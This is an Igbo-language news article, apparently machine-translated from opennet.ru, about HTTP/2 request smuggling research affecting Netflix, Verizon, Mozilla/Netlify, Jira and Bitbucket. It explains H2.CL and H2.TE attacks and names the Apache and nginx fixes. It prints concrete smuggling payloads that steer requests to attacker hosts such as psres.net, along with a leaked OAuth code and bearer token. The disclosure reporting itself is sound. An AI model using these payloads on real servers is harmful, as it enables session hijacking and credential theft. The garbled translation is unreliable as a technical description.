Sistemụ Weebụ nke njedebe ihu na-anabata njikọ site na HTTP/2 ma na-ebufe ha na azụ azụ site na HTTP/1.1 ekpughere na ụdị ọhụrụ nke ọgụ “HTTP Request Smuggling” nke na-enye ohere, site na izipu arịrịọ ndị ahịa ahaziri ahazi, ka banye n'ime ọdịnaya nke arịrịọ sitere n'aka ndị ọrụ ndị ọzọ ahazigoro n'otu ọsọ ahụ n'etiti frontend na azụ azụ. Enwere ike iji mbuso agha a tinye koodu Javascript ọjọọ n'ime nnọkọ nwere ebe nrụọrụ weebụ ziri ezi, gafere sistemụ mmachi ohere yana igbochi paramita nyocha.
Nsogbu a na-emetụta proxies webụ, ndị na-ebu ibu ibu, ndị na-eme ngwa ngwa weebụ, usoro nnyefe ọdịnaya na nhazi ndị ọzọ nke a na-ebugharị arịrịọ na n'ihu-ọgwụgwụ-na-azụ azụ. Onye edemede nke ọmụmụ ahụ gosipụtara ohere nke ịwakpo usoro nke Netflix, Verizon, Bitbucket, Netlify CDN na Atlassian, ma nata 56 puku dollar na mmemme ụgwọ ọrụ maka ịchọpụta adịghị ike. Ekwuputakwara nsogbu a na ngwaahịa netwọkụ F5. Nsogbu a na-emetụta ụfọdụ mod_proxy na sava Apache http (CVE-2021-33193), a na-atụ anya ndozi na ụdị 2.4.49 (a gwara ndị mmepe maka nsogbu ahụ na mbido May ma nye ha ọnwa 3 iji dozie ya). Na nginx, ike n'otu oge ezipụta "Ọdịnaya- Ogologo" na "Nnyefe-Encoding" nkụnye eji isi mee ka egbochiri na ntọhapụ ikpeazụ (1.21.1). Agbakwunyelarị ngwa ọgụ na ngwa ngwa Burp ma dị n'ụdị ndọtị Turbo Intruder.
Ụkpụrụ nke ịrụ ọrụ nke usoro ọhụrụ nke wedging arịrịọ n'ime okporo ụzọ yiri adịghị ike nke otu onye nchọpụta ahụ chọpụtara afọ abụọ gara aga, ma ọ bụ nanị n'ihu ihu na-anabata arịrịọ n'elu HTTP/1.1. Ka anyị cheta na n'ime atụmatụ azụ azụ azụ, arịrịọ ndị ahịa na-enweta site na ọnụ ụzọ ọzọ - frontend, nke na-eme ka njikọ TCP dị ogologo na azụ azụ, nke na-edozi arịrịọ ozugbo. Site na njikọ a na-ahụkarị, a na-ebufekarị arịrịọ sitere n'aka ndị ọrụ dị iche iche, nke na-eso agbụ a n'otu n'otu, nkewapụrụ site na protocol HTTP.
Mwakpo "HTTP Arịrịọ Smuggling" kpochapụwo gbadoro ụkwụ na n'ihu na azụ na-akọwa iji isi HTTP "Ọdịnaya- Ogologo" (na-ekpebi ọnụọgụ data dị na arịrịọ ahụ) na "Nfefe-Encoding: chunked" (na-enye ohere). A ga-ebufe data na akụkụ) dị iche iche. Dịka ọmụmaatụ, ọ bụrụ na ihu ihu na-akwado naanị "Ọdịnaya- Ogologo" mana na-eleghara "Nfefe-Encoding: chunked", mgbe ahụ onye na-awakpo nwere ike izipu arịrịọ nke nwere ma "Ọdịnaya- Ogologo" na "Nnyefe-Encoding: chunked" nkụnye eji isi mee, mana. nha bụ "Ọdịnaya-Ọdịnaya" adabaghị nha nke yinye a kụjiri agbaji. N'okwu a, frontend ga-edozi ma redirect arịrịọ ahụ dịka "Ọdịnaya- Ogologo", na azụ azụ ga-echere mmecha nke ngọngọ ahụ dabere na "Nfefe-Encoding: chunked" na ọdụ fọdụrụ nke arịrịọ onye mwakpo ahụ ga-echere. bụrụ na mmalite nke arịrịọ onye ọzọ bufee ọzọ.
N'adịghị ka ederede protocol HTTP/1.1, nke a tụgharịrị n'ọkwa ahịrị, HTTP/2 bụ usoro ọnụọgụ abụọ ma na-ejikwa ngọngọ data nke nha akọwapụtagoro. Agbanyeghị, HTTP/2 na-eji pseudo-headers kwekọrọ na isi HTTP oge niile. N'ihe banyere mmekọrịta na backend site na HTTP / 1.1 protocol, frontend sụgharịa pseudo-headers ndị a HTTP nkụnye eji isi mee HTTP/1.1. Nsogbu bụ na azụ azụ na-eme mkpebi gbasara ịkpachapụ anya iyi dabere na nkụnye eji isi mee HTTP setịpụrụ site na frontend, na-enweghị ozi gbasara paramita nke arịrịọ mbụ ahụ.
Karịsịa, ụkpụrụ "ọdịnaya-ogologo" na "ngbanwe-ngbanwe" nwere ike ibunye n'ụdị pseudo-headers, n'agbanyeghị na ejighị ha na HTTP / 2, ebe ọ bụ na a na-ekpebi nha data niile. n'ubi dị iche. Agbanyeghị, n'oge usoro ịtụgharị arịrịọ HTTP / 2 na HTTP / 1.1, a na-ebufe nkụnye ndị a ma nwee ike ịgbagha azụ azụ. Enwere ụdị ọgụ abụọ dị iche iche: H2.TE na H2.CL, nke a na-eduhie azụ azụ site na ntinye ntinye na-ezighi ezi ma ọ bụ uru ogologo ọdịnaya nke na-adabaghị na nha nke arịrịọ ahụ nke frontend natara site na HTTP/2 protocol.
Otu ihe atụ nke ọgụ H2.CL bụ ịkọwapụta nha na-ezighi ezi na pseudo-header ogologo ọdịnaya mgbe ị na-eziga arịrịọ HTTP/2 na Netflix. Arịrịọ a na-eduga na mgbakwunye nke nkụnye eji isi mee HTTP yiri Ọdịnaya- Ogologo mgbe ị na-enweta azụ azụ site na HTTP/1.1, mana ebe ọ bụ na akọwapụtaghị nha dị na Ọdịnaya-Ogologo erughị nke ahụ n'ezie, a na-ahazi akụkụ nke data dị na ọdụ dị ka mmalite nke arịrịọ ọzọ.
Dịka ọmụmaatụ, rịọ HTTP/2: usoro POST: ụzọ / n: ikike www.netflix.com ọdịnaya-ogologo 4 abcdGET /n HTTP/1.1 Onye ọbịa: 02.rs?x.netflix.com Foo: mmanya.
Ọ ga-eme ka ezigara arịrịọ na azụ azụ: POST /n HTTP/1.1 Onye ọbịa: www.netflix.com Ọdịnaya- Ogologo: 4 abcdGET / n HTTP/1.1 Onye ọbịa: 02.rs?x.netflix.com Foo: mmanya
Ebe ọ bụ na ogologo ọdịnaya nwere uru nke 4, azụ azụ ga-anabata naanị "abcd" dị ka akụkụ nke arịrịọ ahụ, a ga-ahazikwa "GET / n HTTP/1.1..." ndị ọzọ dị ka mmalite nke arịrịọ na-esote. jikọtara ya na onye ọrụ ọzọ. N'ihi ya, iyi ahụ ga-agbanwe agbanwe na nzaghachi nye arịrịọ na-esote, a ga-enye nsonaazụ nke nhazi arịrịọ dummy. N'ihe banyere Netflix, ịkọwapụta onye ọbịa nke atọ na "Onye ọbịa:" nkụnye eji isi mee na arịrịọ dum mere ka onye ahịa weghachi nzaghachi "Ebe: https://02.rs?x.netflix.com/n" na kwere ka ezigara onye ahịa ọdịnaya aka ike, gụnyere Gbaa koodu Javascript gị n'ọnọdụ nke saịtị Netflix.
Nhọrọ mbuso agha nke abụọ (H2.TE) gụnyere idochi isi okwu "Nnyefe-Encoding: chunked" nkụnye eji isi mee. Iji ihe pseudo-header nyefe na HTTP/2 amachibidoro site na nkọwapụta na edebere arịrịọ ya ka a na-emeso ya dị ka ezighi ezi. N'agbanyeghị nke a, ụfọdụ mmejuputa n'ihu anaghị eburu ihe a chọrọ n'uche wee kwe ka ojiji nke ntinye ntinye-encoding pseudo-header na HTTP/2, nke na-agbanwe n'ime isi HTTP yiri ya. Ọ bụrụ na e nwere nkụnye eji isi mee “Transfer-Encoding”, azụ azụ nwere ike were ya dị ka ihe kacha mkpa ma tụsaa ibe data ahụ n'ụdị “chunked” site na iji ngọngọ nke nha dị iche iche n'ụdị “{size}\r\n{block }\r\n{size} \r\n{block}\r\n0", n'agbanyeghị na mbụ nkewa site na mkpokọta nha.
E gosipụtara ọnụnọ nke ọdịiche dị otú ahụ site na ihe atụ nke Verizon. Nsogbu a metụtara ụzọ nyocha na sistemu njikwa ọdịnaya, nke a na-ejikwa na saịtị dịka Huffington Post na Engadget. Dịka ọmụmaatụ, arịrịọ onye ahịa site na HTTP/2 :: usoro POST :path /identitfy/XUI :authority id.b2b.oath.com transfer-encoding chunked 0 GET /oops HTTP/1.1 Onye ọbịa: psres.net Ọdịnaya- Ogologo: 10 x=
Ihe kpatara na izipu arịrịọ HTTP/1.1 na azụ azụ: POST /identity/XUI HTTP/1.1 Onye ọbịa: id.b2b.oath.com Ọdịnaya- Ogologo: 66 Nyefee-Encoding: chunked 0 GET /oops HTTP/1.1 Onye ọbịa: psres. net ọdịnaya- Ogologo: 10x=
Azụ azụ, n'aka nke ya, leghaara isi okwu "Ọdịnaya- Ogologo" wee mee nkewa n'ime iyi dabere na "Ngbanwe-Encoding: chunked". Na omume, mbuso agha ahụ mere ka o kwe omume ibugharị arịrịọ onye ọrụ na webụsaịtị ha, gụnyere nbanye arịrịọ metụtara nyocha OAuth, nke egosipụtara na paramita ya na nkụnye eji isi mee, yana ịmegharị nnọkọ nyocha na ịkpalite sistemụ onye ọrụ izipu nzere. nye onye na-ebuso onye agha. Nweta /b2blanding/show/oops HTTP/1.1 Onye ọbịa: psres.net Referer: https://id.b2b.oath.com/?…&code=nzuzo GET / HTTP/1.1 Onye ọbịa: psres.net ikike: Onye na-ebu eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik…
Iji wakpo mmejuputa HTTP/2 nke na-anaghị ekwe ka akọwapụtara pseudo-header mbufe, atụpụtala usoro ọzọ nke gụnyere dochie isi okwu “Ngbanwe-Encoding” site na ijikọta ya na ndị isi pseudo-isi ndị ọzọ kewapụrụ site na njirimara akara ọhụrụ. mgbe a gbanwere na HTTP / 1.1 na nke a na-emepụta isi HTTP abụọ dị iche iche).
Dịka ọmụmaatụ, nsogbu a metụtara Atlassian Jira na Netlify CDN (a na-eje ozi mmalite nke Mozilla na Firefox). Kpọmkwem, arịrịọ HTTP/2: usoro POST: ụzọ /: ikike start.mozilla.org foo b\r\n transfer-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Onye ọbịa : evil-netlify-domain\r\n Ọdịnaya- Ogologo: 5\r\n \r\nx=
rụpụtara na ezigara arịrịọ HTTP/1.1 POST / HTTP/1.1 na azụ azụ\r\n Onye ọbịa: start.mozilla.org\r\n Foo: b\r\n Nyefee-nkode: chunked\r\n Content-Length : 71\r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Onye ọbịa: evil-netlify-domain\r\n Ọdịnaya- Ogologo: 5\r\n \r \nx=
Nhọrọ ọzọ maka iji dochie isi okwu "Nfefe-Encoding" bụ itinye ya na aha pseudo-header ọzọ ma ọ bụ n'ahịrị nwere usoro arịrịọ. Dịka ọmụmaatụ, mgbe ị na-abanye Atlassian Jira, aha pseudo-header "foo:bar\r\ntransfer-encoding" nwere uru "chunked" mere ka agbakwunyere nkụnye eji isi mee HTTP "foo:bar" na "nnyefe-encoding: chunked" , na ịkọwapụta uru pseudo-header ": usoro" uru "GET / HTTP/1.1\r\n Nyefee-encoding: chunked" ka a tụgharịrị ka ọ bụrụ "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
Onye nyocha nke chọpụtara nsogbu ahụ tụkwara aro usoro ịgbagharị arịrịọ iji wakpo ihu ihu, nke adreesị IP ọ bụla na-ewepụta njikọ dị iche na azụ azụ na okporo ụzọ sitere na ndị ọrụ dị iche iche adịghị agwakọta. Usoro a na-atụ aro anaghị ekwe ka itinye aka na arịrịọ sitere n'aka ndị ọrụ ndị ọzọ, mana ọ na-eme ka o kwe omume imebi oghere nkekọrịta nke na-emetụta nhazi nke arịrịọ ndị ọzọ, ma na-enye ohere iji dochie isi okwu HTTP dị n'ime iji nyefee ozi ọrụ site na frontend na azụ azụ ( ọmụmaatụ, mgbe authenticating na frontend akụkụ dị otú ahụ nkụnye eji isi mee nwere ike ịnyefe ozi gbasara onye ọrụ ugbu a na azụ azụ). Dịka ọmụmaatụ nke itinye usoro ahụ na omume, na-eji nsị cache, ọ ga-ekwe omume ịnweta njikwa ibe na ọrụ Bitbucket.
isi: opennet.ru